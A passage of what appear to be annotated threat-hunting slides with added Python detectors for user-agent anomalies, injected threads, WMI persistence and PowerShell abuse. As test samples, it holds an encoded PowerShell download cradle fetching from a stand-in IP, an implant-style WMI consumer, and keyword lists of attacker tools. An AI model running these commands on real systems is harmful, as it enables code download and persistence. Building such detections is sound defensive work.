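        ua, proc = r["user_agent"], r["process"].lower()
        if proc in LOLBINS:
            hits.append(("lolbin-outbound", r))
        if ua == "":
            hits.append(("blank-ua", r))
            continue
        if ua in common:
            continue
        if any(edit_distance(ua, c) <= DEVIATION_MAX_EDITS for c in common):
            hits.append(("ua-deviation", r))
        elif len(ua_hosts[ua]) == 1:
            hits.append(("ua-one-off", r))
    return hits


CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0.4472.124 Safari/537.36"
# Constructed records: three normal Chrome hosts, then the interesting ones.
SAMPLE = [
    {"host": f"ws{i}", "process": "chrome.exe", "user_agent": CHROME, "dest": "example.com"}
    for i in range(3)
] + [
    {"host": "ws7", "process": "powershell.exe", "user_agent": "", "dest": "198.51.100.7"},
    {"host": "ws8", "process": "certutil.exe", "user_agent": "Microsoft-CryptoAPI/10.0",
     "dest": "198.51.100.9"},
    {"host": "ws9", "process": "svchost.exe",
     "user_agent": CHROME.replace("Windows NT", "Windows MT"), "dest": "198.51.100.3"},
    {"host": "ws4", "process": "iexplore.exe", "user_agent": "Mozilla/4.0 (compatible; MSIE 7.0)",
     "dest": "198.51.100.5"},
]

if __name__ == "__main__":
    for rule, rec in detect_ua_anomalies(SAMPLE):
        print(f"{rule:16} {rec['host']:5} {rec['process']:16} {rec['user_agent']!r}")
```

The "common" set is learned from the data itself rather than hard-coded, so the same function works on any fleet; the cost is that a UA only becomes a one-off or deviation relative to what the rest of the environment actually sends, which is exactly the baseline the slide's "slight deviations" rule needs.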
Execution Detection: Code Injection
• Anomalous process/thread activity:
  • Cross-process activity
  • Remote thread activity
• Anomalous regions of memory (rights):
  • Memory protection constants: read, write-copy, write, execute, etc…
  • Protection constants typical of code injection: RWX (PAGE_EXECUTE_READWRITE), RCX
  • FPs = csrss.exe, lsass.exe, svchost.exe
• Get-InjectedThread: https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
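The memory-rights check on this slide is the core of the linked Get-InjectedThread approach: a thread whose start address sits in memory that is executable but not backed by a loaded image (MEM_PRIVATE, the kind VirtualAllocEx hands out) is the injected-code signature, and the slide's FP processes are handled by tagging rather than dropping. The script below is an added example (not code from the talk or the gist) that implements that decision over constructed region and thread records; the Win32 constants are real, the memory map, thread list and process name are assumptions, and on Windows they would come from VirtualQueryEx and NtQueryInformationThread.

```python
"""Added example (not from the talk): the memory-region logic behind the
slide and behind Get-InjectedThread, which it links.  A thread whose start
address lies in an executable region not backed by an image file (e.g.
MEM_PRIVATE from VirtualAllocEx) is the injected-code signature.  Region
and thread records are constructed; on Windows they come from
VirtualQueryEx / NtQueryInformationThread."""

# Constants straight from the Win32 memory API.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40     # RWX on the slide
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
PAGE_NOCACHE = 0x200
PAGE_WRITECOMBINE = 0x400
MEM_IMAGE = 0x1000000
MEM_MAPPED = 0x40000
MEM_PRIVATE = 0x20000
EXECUTABLE = (PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
# Processes the slide lists as frequent false positives; triage, don't drop.
KNOWN_FP = {"csrss.exe", "lsass.exe", "svchost.exe"}


def region_for(address: int, regions: list):
    """Find the VirtualQuery-style region containing address, or None."""
    for r in regions:
        if r["base"] <= address < r["base"] + r["size"]:
            return r
    return None


def is_executable(protect: int) -> bool:
    """True for any execute protection; modifier bits are masked off first."""
    return (protect & ~(PAGE_GUARD | PAGE_NOCACHE | PAGE_WRITECOMBINE)) in EXECUTABLE


def find_injected_threads(process: str, threads: list, regions: list) -> list:
    """Return one finding per thread whose start address looks injected."""
    findings = []
    for t in threads:
        r = region_for(t["start_address"], regions)
        if r is None or not is_executable(r["protect"]):
            continue
        if r["type"] == MEM_IMAGE:
            continue                      # backed by a loaded module: normal
        findings.append({
            "process": process, "tid": t["tid"],
            "start": hex(t["start_address"]), "region_type": hex(r["type"]),
            "protect": hex(r["protect"]),
            "rwx": r["protect"] == PAGE_EXECUTE_READWRITE,
            "likely_fp": process.lower() in KNOWN_FP,
        })
    return findings


# Constructed memory map of one process: a module's code, a heap, and a
# private RWX allocation typical of VirtualAllocEx + CreateRemoteThread.
REGIONS = [
    {"base": 0x7FF600001000, "size": 0x80000, "type": MEM_IMAGE, "protect": PAGE_EXECUTE_READ},
    {"base": 0x1A000000000, "size": 0x10000, "type": MEM_PRIVATE, "protect": 0x04},
    {"base": 0x1A000200000, "size": 0x1000, "type": MEM_PRIVATE, "protect": PAGE_EXECUTE_READWRITE},
]
THREADS = [
    {"tid": 1204, "start_address": 0x7FF600012340},   # normal: inside the module
    {"tid": 1377, "start_address": 0x1A000200010},    # suspicious: private RWX
]

if __name__ == "__main__":
    for finding in find_injected_threads("notepad.exe", THREADS, REGIONS):
        print(finding)
```

Two caveats a practitioner should keep in mind: attackers can flip the region back to PAGE_EXECUTE_READ once the payload is written, so the RWX flag is evidence, not a requirement; and JIT runtimes (.NET, browsers) legitimately create private executable memory, which is where the slide's false-positive list comes from.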
Pattern Matching - Yara
• Scanning file systems/memory with Yara signatures
• Pattern match specific malware families or profile malware based off of APIs/strings
• AV detections are often proprietary; you don't know what specifically makes them fire
• At the perimeter or on routine scans

Detecting Persistence: Favorites
• Monitoring heavily used persistence mechanisms:
  • (HKLM|HKCU)\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\SYSTEM\CurrentControlSet\Services
  • These autorun locations should not be modified often (especially not the values under HKLM)
  • Scheduled tasks
  • WMI

Leveraging WMI
• Use at scale for cheap (sysadmin style)
• Lower visibility than most AV/EDR
• Level the playing field
• Anomalous process privileges
• WMI spawns processes under PPID wmiprvse.exe

WMI via PS
• Check for:
  • Persistence (FilterToConsumerBinding):
    • gwmi -Namespace root\subscription -Class __FilterToConsumerBinding
  • Trigger/condition (EventFilter):
    • gwmi -Namespace root\subscription -Class __EventFilter
  • Action/payload (EventConsumer):
    • gwmi -Namespace root\subscription -Class __EventConsumer
  • Anomalous namespaces:
    • gwmi -Namespace root -Class __NameSpace | select name
    • = database of classes/instances
  • Anomalous classes:
    • gwmi -Namespace [NameSpace] -List
    • = managing specific objects
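The three gwmi queries above return the filter, the consumer and the binding separately; the analyst's job is to join them through the binding's Filter and Consumer references and decide which chains matter. The script below is an added example (not code from the talk) that does that join and scores each chain, serving both the "Fileless…ish malware cont'd" slide (which classes make up a permanent event subscription) and the "WMI via PS" slide (how to pull them). The records are constructed to look like gwmi output converted to dicts; the marker lists used for scoring and the record names are assumptions, and on a real host the input would be the gwmi output piped through ConvertTo-Json.

```python
"""Added example (not from the talk): triage of the three root\subscription
classes the slide queries (__EventFilter, __EventConsumer,
__FilterToConsumerBinding), joined through the binding's Filter/Consumer
references and scored.  Records are constructed to look like
`gwmi -Namespace root\subscription -Class ...` output as dicts."""
import re

# Matches '__EventFilter.Name="X"' with or without a leading \\HOST\root\subscription: path.
REF_RE = re.compile(r'^(?:\\\\[^\\]+\\root\\subscription:)?(\w+)\.Name="([^"]+)"$')
# Consumer classes that execute arbitrary code.
CODE_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Strings in a payload that should always be looked at (assumed list).
PAYLOAD_MARKERS = ["powershell", "-enc", "-nop", "net.webclient", "wscript", "mshta",
                   "regsvr32", "certutil", "bitsadmin", "rundll32"]
# Trigger shapes implants favour: timers and boot/uptime/logon windows (assumed list).
TRIGGER_MARKERS = ["__timerevent", "win32_localtime", "win32_perfformatteddata_perfos_system",
                   "systemuptime", "win32_logonsession"]


def parse_ref(ref: str):
    """'__EventFilter.Name="X"' -> ("__EventFilter", "X"); None if malformed."""
    m = REF_RE.match(ref)
    return (m.group(1), m.group(2)) if m else None


def payload_of(consumer: dict) -> str:
    """The text that actually runs when the consumer fires."""
    cls = consumer["__CLASS"]
    if cls == "CommandLineEventConsumer":
        return consumer.get("CommandLineTemplate", "") or consumer.get("ExecutablePath", "")
    if cls == "ActiveScriptEventConsumer":
        return consumer.get("ScriptText", "") or consumer.get("ScriptFileName", "")
    return ""


def triage_subscriptions(filters: list, consumers: list, bindings: list) -> list:
    """Join each binding to its filter and consumer and score the chain."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    results = []
    for b in bindings:
        fref, cref = parse_ref(b["Filter"]), parse_ref(b["Consumer"])
        flt = by_filter.get(fref[1]) if fref else None
        con = by_consumer.get(cref) if cref else None
        reasons = []
        if flt is None or con is None:
            reasons.append("dangling reference (filter or consumer missing)")
        if con and con["__CLASS"] in CODE_CONSUMERS:
            reasons.append(f"code-executing consumer {con['__CLASS']}")
            text = payload_of(con).lower()
            hits = [m for m in PAYLOAD_MARKERS if m in text]
            if hits:
                reasons.append("payload markers: " + ", ".join(hits))
        if flt:
            q = flt.get("Query", "").lower()
            trig = [m for m in TRIGGER_MARKERS if m in q]
            if trig:
                reasons.append("timer/boot trigger: " + ", ".join(trig))
        results.append({"filter": flt["Name"] if flt else None,
                        "consumer": con["Name"] if con else None,
                        "score": len(reasons), "reasons": reasons})
    return sorted(results, key=lambda r: -r["score"])


# Constructed records: an implant-style chain (uptime-window trigger firing an
# encoded PowerShell command) and a benign chain that only writes an event log entry.
FILTERS = [
    {"Name": "BotFilter82", "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
     "AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"},
    {"Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
]
CONSUMERS = [
    {"__CLASS": "CommandLineEventConsumer", "Name": "BotConsumer23",
     "CommandLineTemplate": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"__CLASS": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="BotFilter82"',
     "Consumer": 'CommandLineEventConsumer.Name="BotConsumer23"'},
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

if __name__ == "__main__":
    for r in triage_subscriptions(FILTERS, CONSUMERS, BINDINGS):
        print(r["score"], r["filter"], "->", r["consumer"], r["reasons"])
```

The "SCM Event Log" chain is present on a default Windows install, which is why a consumer-class check matters more than the mere existence of a binding: a NTEventLogEventConsumer cannot run code, a CommandLineEventConsumer or ActiveScriptEventConsumer can. A dangling reference is flagged too, since an implant that deleted only its filter still leaves a consumer holding the payload.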
Misc Detections
• Clean up:
  • Event ID 1102: The audit log was cleared
• PowerShell auditing:
  • Get-WinEvent -LogName 'Windows PowerShell'
  • -EncodedCommand / -enc / -e
  • -nop
  • Net.WebClient
  • '[a-zA-Z0-9/+=]{20,}' (long base64 runs)
  • -ExecutionPolicy bypass
  • Process relationships
• Sweep for other stuff:
  • Mutexes, registry values, weird file types (.iqy, .slk, etc…), prefetch (.pf) for known bad (malware.exe-XXXXXXXX.pf)
• Correlate events:
  • JS followed by .exe download
  • .exe download + weird UA
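The PowerShell auditing bullets above are only useful if the -EncodedCommand layer is peeled off first: the value is base64 of the UTF-16LE script, so a plain base64 decode leaves interleaved NUL bytes and the Net.WebClient check never matches. The script below is an added example (not code from the talk) that decodes that layer and then applies the slide's indicators, including the slide's own base64-run regex, to constructed command lines; the rule regexes, the helper that builds the encoded sample and the sample command lines are assumptions for the example.

```python
"""Added example (not from the talk): the PowerShell auditing checks from
the slide applied to constructed command lines.  -EncodedCommand carries
base64 of the UTF-16LE script, so the decoder undoes both layers before
the Net.WebClient / -nop / bypass rules run; the long-base64 regex is the
one on the slide."""
import base64
import re

BASE64_RUN = re.compile(r"[a-zA-Z0-9/+=]{20,}")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; list them explicitly.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|"
                      r"encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|"
                      r"encodedcommand)\s+(\S+)")
# (rule, regex applied to the command line plus its decoded payload); assumed list
# derived from the slide's bullets.
RULES = [
    ("no-profile", re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")),
    ("execution-policy-bypass", re.compile(r"(?i)-ex\w*\s+bypass")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("net-webclient", re.compile(r"(?i)net\.webclient")),
    ("download-cradle", re.compile(r"(?i)download(?:string|file)|invoke-expression|\biex\b")),
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if an -EncodedCommand argument is present and valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_powershell(cmdline: str) -> dict:
    """Flatten the encoded layer, then apply every rule to both layers."""
    decoded = decode_encoded_command(cmdline)
    searchable = cmdline + ("\n" + decoded if decoded else "")
    flags = [name for name, rx in RULES if rx.search(searchable)]
    if decoded is not None:
        flags.insert(0, "encoded-command")
    if BASE64_RUN.search(cmdline):
        flags.append("long-base64-run")
    return {"decoded": decoded, "flags": flags}


def encode_for_powershell(script: str) -> str:
    """Build a sample the way an attacker would: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples: a classic download cradle, and a benign admin command.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLES = [
    f"powershell.exe -nop -w hidden -ExecutionPolicy bypass -enc {encode_for_powershell(CRADLE)}",
    "powershell.exe -NoProfile -Command Get-Service -Name spooler",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(audit_powershell(s))
```

The benign sample still trips "no-profile", which is the point of the slide's "process relationships" bullet: -nop on its own is an administrator habit, -nop together with a hidden window, an encoded cradle and an Office parent is an incident. Script Block Logging (event 4104) records the decoded script directly and is the better source where it is enabled; the 'Windows PowerShell' log the slide queries predates it and is why the decoding step is needed here.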